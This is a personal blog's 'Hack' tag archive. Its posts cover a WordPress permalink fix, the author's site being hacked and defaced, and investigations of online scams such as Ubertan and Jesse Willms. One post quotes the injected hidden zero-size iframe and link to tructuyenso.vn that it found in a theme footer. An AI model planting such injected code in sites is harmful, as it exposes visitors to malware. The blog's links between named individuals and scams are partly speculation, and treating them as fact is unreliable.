Tag Archive: Hack

WordPress Permalinks Generated But Not Redirected

Introduction

Appalled

Appalled

I’ve had a few site problems whereby my host Site 5, said I was using too many resources and crashing their systems.  Naturally, I was appalled.  I traced this to a variety of plugins plus some errors in php files which must have arrived either during the periodic updates or during editing.  These were errors whereby extra text (either blank space or a carriage return to be precise) were added to the end of the php file, which usually makes it fail.  This a is a Google search on the main error I received,

Warning: Cannot modify header information – headers already sent …  (  This is then followed by error details; usually error on line xx, repeated several times for a variety of xx)

After battling for some time, I just gave up, exported my database key tables (things like posts, comments, etc but omitting plugin inserted tables and the very large options table which I deemed to be very bloated after over five years of continuous WordPress operation…!) and re-installed WordPress as a fresh installation on my server.

Weird Permalink Problem Following Clean Install of WordPress

This is where the weird problem arose….

SP Permalink Settings

SP Permalink Settings

When one installs WordPress for the first time, permalinks are set to the default – so this current post would be:

 http://strangelyperfect.tv/?p=11622

For SEO reasons and for many years I’ve used the format shown in the screenshot from my site shown left.  This current post will thus appear as:

http://strangelyperfect.tv/11622/wordpress-permalinks-generated-but-not-redirected

It’s a “Custom Structure” and the .htaccess file is updated automatically by WordPress when you set it.  You’ll see it’s set to:

/%post_id%/%postname%/

Now, on firing up a post, say this one,

http://strangelyperfect.tv/11428/victory-or-is-it-victory-jesse-willms-surrenders-all-to-ftc-onslaught/ ,

the actual web address I was taken to was:

http://strangelyperfect.tv/%post_id%/victory-or-is-it-victory-jesse-willms-surrenders-all-to-ftc-onslaught/  (error shown in bold)

…which redirected to the homepage of the site, http://strangelyperfect.tv/   This was not what I was expecting!  So I played with the slashes, went back to original simple permalink structure, tried some of the suggested structures – and they all worked!

A custom structure of /%postname%/ worked as well, but not the one I wanted and have used for years.

Weird.   So naturally, I tried Google.

Permalink Redirection Problem Solved.

There’s a lot on the web about this.  Most is about getting .htaccess right with permissions and the code.  But mine was okay, as were all the other suggestions to try.

A real key to resolving my problem was here, Custom Permalinks Generated But Not Redirected in the WordPress forums.  Specifically, it comes from the user, James, a Happiness Engineer!

He suggested adding index.php between the domain name and permalink structure.  So my custom structure changed to:

index.php/%post_id%/%postname%/

WordPress added a leading slash on the save and the website worked!  WAHAY!

However, the best is yet to come….

I thought that the URL was now not pretty, in fact, it was pretty ugly.  The URLs were now being shown like:

http://strangelyperfect.tv/11428/victory-or-is-it-victory-jesse-willms-surrenders-all-to-ftc-onslaught/

So I removed the index.php and reset the custom structure to what I wanted – /%post_id%/%postname%/

It worked!  WAHAY!  All posts’ URLs redirecting  how I wanted!

Conclusion

I’ve no idea, actually.  I’m suspecting some caching, somewhere down the great inter-tubes in the sky, but apart from that…………..?

  • Was it my server?  Dunno.
  • Was it DNS caching?  Dunno.
  • Was it ISP caching? Dunno

All I know is that it’s working now, and the Happiness Engineer’s suggestion sent me on my way, happy.


Postscript – added 22/11/2015

My permalinks in 2015

My permalinks in 2015

Since this time, I have not had to use the index.php fix, and the permalinks are all working correctly.  The flip-flip of adding and removing the fix….just seemed to work!

NoIdeaDeer


 

Enhanced by Zemanta

Related Posts:

Jesse Willms Banned by Judge from Negative Option Selling – Assets Frozen!

Latest News from Tuesday, Seattle

Jesse Willms Banned by Judge from Negative Option Selling – Assets Frozen!

Frozen Assets

Frozen Assets

CBC (with whom Willms has already had a tussle) in Canada are already broadcasting that local high-school athlete drop-out turned internet businessman of dubious repute, the self-styled and self-publicising entrepreneur & charitable Jesse Willms, has had some shackles applied to his business by the order, by a Seattle court, to freeze his assets (in case they’re needed to payout to his alleged victims and fines) and also to not use the negative option gambit in any of his websites.

See the CBC report (and wonderful video) here:

U.S. judge freezes assets of Alberta internet salesman

CBC report on the FTC lawyer Robert Schroeder saying,

The judge also froze the assets of Willms and his companies

I'm not a Flim-flam guy!

I'm not a Flim-flam guy!

This could be the main reason why CBC say that all his websites (that they know of, at least) are down and that his phone is dead.   I’ve checked and the dismal self-publicity blogs are still running, which they would be I suppose, as they’re not selling anything except the idea that Willms is a “good guy”.  The judge is Marsha J. Pechman, Federal Judge out of the Western District Court of Seattle according to the post I’ve linked to.  It finishes with the words:

While Jesse Willms has not responded much to these accusations, he has hired many firms to engage in a positive PR and SEO campaign and consistently sends out news releases claiming that he has been assisting charities with financial donations. Additionally, there are at least a dozen “blogs” setup by Mr. Willms to counteract the negative press with positive SERPS.

This is exactly what this website and many others have been saying for over a year now!  “Performance Marketing Insider” also states that:

Currently, according to news reports, there is a both a consumer and criminal investigation against Mr. Willms in Canada.

Well this is good! And only fair – fair to the thousands and thousands of people that feel duped by Willms’ activities.  Roll on next year – Willms is scheduled for trial in the U.S. in July 2012.  Should be sooner.

According to the CBC report, we see another aspect of Willms’ doings whereby he very rarely admits to any mistakes or wrong-doings.  It’s always someone else’s fault, in his world.  CBC say;

Willms has blamed unscrupulous business associates who he claims defrauded him by stealing credit card numbers in order to generate commissions with bogus sales.

I say,

What?  All of them?  All $457 million dollars worth?

Pull the other one!

Willms’ local paper, the Edmonton Journal, also reports on the asset-freezing story here.  They don’t say anything new – but it’s nice to keep the locals informed, don’t you think?

All those local charities that Willms has been plugging his exploits with over the past year must surely be examining their credibility in the eyes of their donating public.  This connection (and to fair, the charges are not proven yet) to Willms is starting to look very bad for them, people have long memories and mud does stick.  Ask any politician!

Surely?

Jesse Willms and Nolan Paquet

Jesse Willms (r), in the source of the famous grinning shot.

Related Posts:

Hacked – I was a possible Malware Site for tructuyenso.vn!

Introduction

A few days ago I got hacked.  I quickly ripped out a heap of dodgy files left by the hackers but for some days now, Firefox, my browser, while viewing pages on this website, has been saying that it’s “downloading data from tructuyenso.vn… “.

.htaccess

This, of course, was not actually happening, as I’ve put the blockers on the whole of Vietnam using .htaccess!  The reason for this is that initially, tructuyenso wasn’t the only site appearing in the progress tip – there was another which lasted until I got rid of the various files dumped on my website.  This is how:

<Limit GET POST>
order allow,deny
deny from 112.0.0.0/8
allow from all
</Limit>

However, the call was still being made from somewhere on my site as the progress indicator wouldn’t stop….

Site5 Search

A search for the string “tructuyenso.vn” turned up nothing in the files on my website using my website host’s file manager.  (In the end, this was my failing and I will not rely on the thing again!)

A search through my database also turned up zero.

TCPView

TCPView is a download from Sysinternals.com  (now Microsoft!) that shows the various net connections being made to one’s PC from everywhere.  This immediately showed that as soon as the main strangelyperfect.tv website (not the backend WordPress admin area), fired up in Firefox, as many as 7 connections were simultaneously made to 112.78.15.230……  This is the IP address that holds tructuyenso.vn, plus 11 other domains, some of which I’d seen flash through the progress bar.

Even when closed by TCPView, the connections would immediately start up again to the same IP address, 112.78.15.230  (manually closing strangelyperfect.tv stopped the connections).

Reverse IP on tructuyenso.vn

Reverse IP on tructuyenso.vn

YouGetSignal.com shows the domains up nicely in the screenshot above..

Result!

Finding nowt anywhere and Google searches providing zilch on the website in question except in Vietnamese, I turned to the WordPress Codex, specifically, https://codex.wordpress.org/FAQ_My_site_was_hacked

I had of course previously changed my FTP, mySQL databaase and site management passwords, but the link at the bottom to a Website malware & blacklist scan (Sucuri) was the killer!  On visiting Sucuri, it instantly said that I was acting as a host for malware and gave the offending results, for free! (Of course, I wasn’t hosting malware – just that it gave an indication that I was and hence the slowness of the site to load as it tried and failed to download shite my way from Vietnam)

This is their take on it: http://sucuri.net/malware/malware-entry-mwiframehd202

Final Cause and Clean Up

Checking the source code for my homepage (which in retrospect I should have done first!!) threw up “tructuyenso.vn” right at the very bottom.  This is the code as it was when I checked:

<a href="http://tructuyenso.vn" title="Quang cao truc tuyen | Ban hang truc tuyen | Dien dan quang cao truc tuyen" > Quang cao truc tuyen</a>
<iframe marginWidth="0" marginHeight="0" frameBorder="0" width="0" height="0" bottommargin="0" rightmargin="0" leftmargin="0" topmargin="0" nosize scrolling="no" src="http://tructuyenso.vn/"></iframe>
</body>
</html>

This was then easily traced to the footer.php file in my theme, Suffusion.

It was simply stripped out and the website then worked fine…..  but to be sure, I have downloaded then checked the footer file in a fresh theme download to be sure – it’s clean!  I then uploaded a whole clean Suffusion theme in it’s entirety just in case any other theme files were compromised during the original hack yet were dormant, waiting for a trigger.

A recheck on Securi shows my website to be okay now.  See screendump below.   I’ll be using Securi  a lot more!

Securi Site Check

Securi Site Check

Related Posts:

Comments are closed

Turkish Hacker-Crackers, perhaps?

A Cracking Week Off?

I had a week’s holiday of sorts last week.  On returning I found that this website had been cracked. (I already had intimations that something was wrong because of site stat failures and an email from @Justin Asking, sometime commenter to this website and others).  Anyway, so it was.  Unfortunately, I didn’t have good web access so was unable to correct things properly.

The main screen, viewable on zone-h here, was replaced by this,

Site Hack Aug 2011

Site Hack Aug 2011

A neat little JavaScript mouse trailer was part of the package!

The cause was my own – a wide-open directory made so as part of an image upload plugin for my WordPress installation.  This plugin makes it easy and neat for any commenter to add material to the website……unfortunately for me, it allowed any file, with active content or not, to be uploaded.

Needless to say, the plugin is now disabled and the directory is locked down to the specific  file types that I’ll accept.  No more active content allowed there matey!

Unwanted Extras

Once the nasty files were uploaded, the internal site privileges allowed the install of a swathe of .htm files to the site root and uploads folder.  These had various names like f.htm, g.htm etc.  Index.htm was the file on show.

Alongside these, apart from files needed to run the previously mentioned JavaScript, were another swathe of .phtml files, such as joker.phtml, which are actually php code shining as html.  A couple of plain text files had also been uploaded.  These had lists of files, sites and persons.

All .htaccess files were okay as well as the WordPress installation files.  To be sure, I redid the WordPress install from scratch with fresh downloaded files..

Finale

All told, about fifty files were dumped on my website.  I’ve hopefully removed the lot and have them downloaded for analysis at a later date.  The screen content and internal code all points to Turkish or S.E. Asian (Vietnam or Indonesia) Muslim crackers (I refuse to use the hacker term except to clarify the cracking of security by it’s now-common usage).  Saying this, the culprits (the code points to several authors who used freely downloadable files from cracking websites and then proudly expected a pat on the back for their extreme skill at doing a download…like….der….), the culprits could have come from anywhere.

Fifth columnists and agent-provocateurs are nothing new.

Interestingly, being cracked puts me in the same company as at least 186 well-known multinational businesses, such as Acer, Vodaphone, BetFair, The Daily Telegraph, The Register, Spam.Org, Victoria Beckham and Destiny’s Child.

Even System of a Down dot com, was down!

Zone-h’s full list is here.  The Register reports it here, The Guardian here.

The Guardian interview with the crackers notes that the culprits had been planning the attack for some time which obviously includes the time when my site was compromised.  I don’t know if my website was actually used as part of the above DNS server attack but it’s usual for an attack like a DDOS to use several vectors and simultaneous attack points in order to force a server to fail and dump code.  This dump then reveals passwords and the like for later use.

Addendum

WordPress.Org’s forum has a posting about this crack from last week.  A Google search in the comment by RedNeckTexan shows the attack on this website to be far from unique….!   The links I’ve followed go right to the heart of the crack and the people doing the cracking.

This is the Google Search on the “Easy Comment Uploader” plugin.  Like me, RedNeckTexan has pulled the plugin for now, which can be found in the WordPress repository here.

Related Posts:

Comments are closed

From Google Treasure Chest to Sun Tan Scam in Nevis on the BBC?

From Google Treasure Chest to Ubertan Sun Tan Scam in Nevis on the BBC?

A.  yes it’s true!

Ubertan On BBC

Ubertan On BBC

An article on the BBC website today highlighted the dangers of a tanning products called Ubertan.  On reading it, and following up with a simple Google search, the way it is portrayed in forums immediately set off warning bells because of its similarity to other scams I’ve seen.

Ubertan

Ubertan Search

Ubertan Search

A simple Google search showed that warnings about Ubertan have been going on for some time.  This website warned way back in April 2011 and here we have a Mens’s Health forum being shilled by Ubertanners with a post starting in Jan 2011…  The first even shows that the Ubertan website changed it’s copy when folks started complaining.

The Ubertan website is currently ‘live’ however, it is showing no content!  At all!  The Google cache is interesting though (more on that later)…

WHOIS Ubertan

Ubertan WHOIS

Ubertan WHOIS

Who is Ubertan indeed?  !!

WarningBell

Warning Bell

What we see is that “Manufacturers Direct” owns several domains and one Vernon Veira is the contact on the dual island nation of Kitts-Nevis.

10 Solomons Arcade
Charlestown,  00000
KN
+1.3057484919

This is when the warning bells started ringing….

Doing The Charlestown in Nevis

It’s two years ago that I started looking at the now seriously-discredited Google Treasure Chest scam (see http://strangelyperfect.tv/3099/google-treasure-chest-its-a-scam-and-a-half/).  the amount of information I had, meant I had to post over several different postings, and it was during these later investigations that a Post Office address (P.O. Box) came up on Nevis.  In Charlestown.

Unfortunately, I couldn’t remember exactly what address it was.  But it’s easily found here a comment from @NotKevin.  I think it’s the first time we saw the address, although it has since popped up many times when checking out folks that would be preferred to be known as “online marketeers” but we like to call scammers.  This is on the posting,

This is the address.

New Online Systems Ltd.
P.O. Box 642, Main Street
Charlestown, Nevis, West Indies

Google Cache

Ubertan Google Cache

Ubertan Google Cache

Ubertan may be silent, but the Google Cache is active and shows this address down at the bottom of the first cached page:

Ubertan.com +44 161 408 5816
Subertan Ltd 642 Main Street, Charlestown, Nevis

 

Uber morphs into Suber, and because the Post Office on Charlestown is one of the few buildings on Main  Street, Charlestown; a whole host of P.O. Boxes exist inside.

P.O. Box 642 means 642 Main Street!

Who are these people using 642?  I don’t know.

What I do know is that the domains listed by @NotKevin, although not exactly the same,  bear a shocking similarity to those domains used by people like Jesse Willms (say) before he decided to turn into a saint-like activist and Pacific WebWorks (say) before they got their pants sued off them.  This is what @NotKevin said:

That West Indies address is also linked with porn:
http://www.highdefriches.com/contact.php
http://www.eshspt.com/
(another Co Durham address on that one too!)
“health products”:
http://hiltonhg.com/
Colon cleansing:
http://www.colocleansemax.com/contact-us.php
Acai:
http://acaidetoxmaxx.com/
and Govt Grants:
http://www.complaintsboard.com/complaints/government-grants-avaliable-cd-c116063.html

Now compare and contrast those domains and businesses with the very large list to be found here on WebCops – the plethora of time-limited similarly-named domains means tracking them is an onerous task, well beyond my spare time.

However, yet again, we have seen the same address appear when dealing with dodgy ego-massaging products.

Phoenix-Like TryUbertan

Ubertan may be dead, but it doesn’t take long to find son-of-Ubertan when looking at the decidedly un-Caribbean telephone number for Ubertan.

+44 161 408 5816 is actually a Manchester, UK number!!

TryUbertan Contact Page

TryUbertan Contact Page

A quick search pulls out…..

Beginnings

Now I know they’re trying to hide!!!

TryUbertan.net on the T&C page now shows the address of Ubertan to be:

Ubertan Sunless Tanning System
c/o Toocoo Media Inc.
39555 Orchard Hill Place
Suite 600
Novi, Michigan
48375

Although it’s supposed to be available from ” high end salons in the U.K, France, Germany, Spain and North America” from their FAQ page, these stores will be doing so ILLEGALLY!  The UK government has officially banned it (as per the UK news item) and is EXPLICITLY ISSUING DANGER WARNINGS about its usage!

Still, TryUbertan (WHOIS is Pennsylvania USA) don’t care.  They’ll just grab the cash and morph into something else.

TooCoo Media CEO

TooCoo Media CEO

The decidedly minimalist website of Toocoo Media Inc, http://www.toocoomedia.com, throws up some interesting conundrums, if that really is their mailing address.  There are two LinkedIn links:

  • http://www.linkedin.com/company/toocoo-media-inc.
  • http://www.linkedin.com/in/jumanok

The latter is for the CEO, a Peter B. Lee whose 3 website links at the bottom of his profile point to the totally and bizarrely un-related websites of:

  • http://www.viafoura.com/
  • https://www.netiq.com/products/migrate/ which then redirects to novell.com as Novell has bought them out
  • http://www.oracle.com/index.html

Mr Lee, who claims to be Canadian from the LinkedIn profile, also has a poetry blog on blogger assuming the same quite distinct user name is being re-used, which is for invited guests only!!!  See The Poetry of Peter B. Lee with the url of http://jumanok.blogspot.com/  I’ve highlighted his key username as it matches the LinkedIn profile.  I don’t think that this Peter Lee (interestingly, a place name in County Durham of all places!) is the same who’s name is used in some recent versions of the classic 419 scam.  Try these examples for a start:

To add to the surreal mix that I’m uncovering, there are also two videos on YouTube uploaded by a “jumanok”!!  One of half a minute looks very much like Mr Lee, doing  some testing thing in Nov 2008 here:

This is a screenshot in case it’s pulled:

Jumanok YouTube

Jumanok YouTube

This is Jumanok from LinkedIn:

Jumanok LinkedIn LargePic

Jumanok LinkedIn LargePic

And here is “Crystal” telling us how her life state has improved after seeing something on OPRAH (down below she says) – except there’s nothing below!!  It appears to be a video plug for something intended to include Oprah in the spiel, except it never happened as there’s nowt to see.  This was uploaded in May, 2009.  The termination of Oprah-related plans may or may not have had something to do with the legal action, taken in May 2009, by Oprah, and reported here on her website;

http://www.oprah.com/health/The-Truth-About-Oprah-Dr-Oz-Acai-Resveratrol-and-Colon-Cleanse

Of course, Oprah sued and won damages against a host of scammers, one of which was Jesse Willms.

Conclusion

  • Time and again we come across scams that are based on a business with a very flakey base (here it’s a banned tanning product with government issued health warnings).  Usually, they are about improving one’s body or finances via unproven “new” medicines or foodstuffs, or get-rich-quick schemes.
  • Time and again we find a myriad of international contact phone numbers & addresses, for businesses that are very minor and specialist yet feel the need to spread themselves to the far corners of the globe.  Q. Why?  A.  Avoidance of easy scrutiny.
  • Time and again, we trace these businesses via LinkedIn (a bit like Jonathon Eborn, say) and other social networks high and wide.  They all start off appearing very legitimate.   As an aside, the Eborn results show a consulting website of http://www.jonathanebornconsulting.com/ and another of http://www.jonathandeborn.com/ which have both been hacked and defaced!  Made my day that!
  • Many businesses have a very public website, of minimalist design and content.  It’s very hard to discern exactly what they’re doing.  Compare these “online marketeers” to the website of Ford or Esso, say?  Now can you tell the difference?

Finally, (and very importantly for your health).  Don’t shove dodgy untested stuff of unknown provender up your nose.  Simple eh?

Related Posts:

© 2007-2017 Strangely Perfect All Rights Reserved -- Copyright notice by me